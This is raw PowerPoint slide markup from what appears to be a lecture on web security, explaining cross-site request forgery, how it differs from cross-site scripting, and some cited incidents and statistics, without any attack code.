              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Leverages bugs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>naïve.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buSzPct val="155000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endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Techniques that protect against XSS: filter content posted on websites for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>scripts. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Does not directly help protect against CSRF. Why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>If site is vulnerable to XSS, it is vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>? Session credentials can be stolen using XSS, and then launch a CSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック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3018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A3EDDC-6591-914B-8867-1A9A8997D2E5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-12700" y="0"/>
            <a:ext cx="13017500" cy="1420416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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is CSRF and Why Should you Care?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1492250"/>
            <a:ext cx="12190413" cy="758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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>When a malicious website causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>s browser to perform unwanted actions on a trusted website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2800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  <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>sleeping giants of web vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> - Zeller &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Felten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2800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  <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Sometimes also referred to as XSRF attacks, confused deputy, session riding,..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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  <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean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  <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The percentage of CSRF is 20% of all Web vulnerabilities in 2012*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2800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  <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>High profile attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2800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  <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Ebay’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> Korea website was attacked in 2008 with 18 million users lost personal information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Mexico bank attack in 2008 caused lost of account information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26336" y="9269288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* https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.whitehatsec.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/resource/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>stats.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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A3EDDC-6591-914B-8867-1A9A8997D2E5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-12700" y="0"/>
            <a:ext cx="13042900" cy="939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6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS vs. CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381720" y="1204392"/>
            <a:ext cx="12241360" cy="7920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marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>CSRF (Cross-site request forgery)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>a malicious website causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>s browser to perform unwanted actions on a trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Examples: Transfer money out of user’s account, harvest user ids, compromise user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>XSS (Cross-site scripting)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>website leverages bugs in trusted website to cause unwanted action on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>s browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>(circumventing the same-origin policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Examples: Reading cookies,  authentication information,  code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>Unlike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst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  <a:tab pos="914400" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Techniques that protect against XSS will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>not necessarily work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>for CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック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4554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C8257-F941-4A47-8C0C-4D07454A8B09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-25400" y="0"/>
            <a:ext cx="13030200" cy="14208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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High-level View of How CSRF Works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="zeller-csrf-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056" y="1420416"/>
            <a:ext cx="5904656" cy="75150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86776" y="8909248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Reference: Zeller &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Felten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 2008</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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13004800" cy="1348408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>XSRF (aka CSRF): Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69634" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapt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986" y="4088837"/>
            <a:ext cx="2043290" cy="204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5" name="Picture 11" descr="CompaqAlphaServerES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410" y="2639343"/>
            <a:ext cx="1643662" cy="2020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6" name="Picture 4" descr="DS15serverfro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134" y="7358099"/>
            <a:ext cx="3465690" cy="1203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5" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8184519" y="6816232"/>
            <a:ext cx="2250857" cy="562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pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
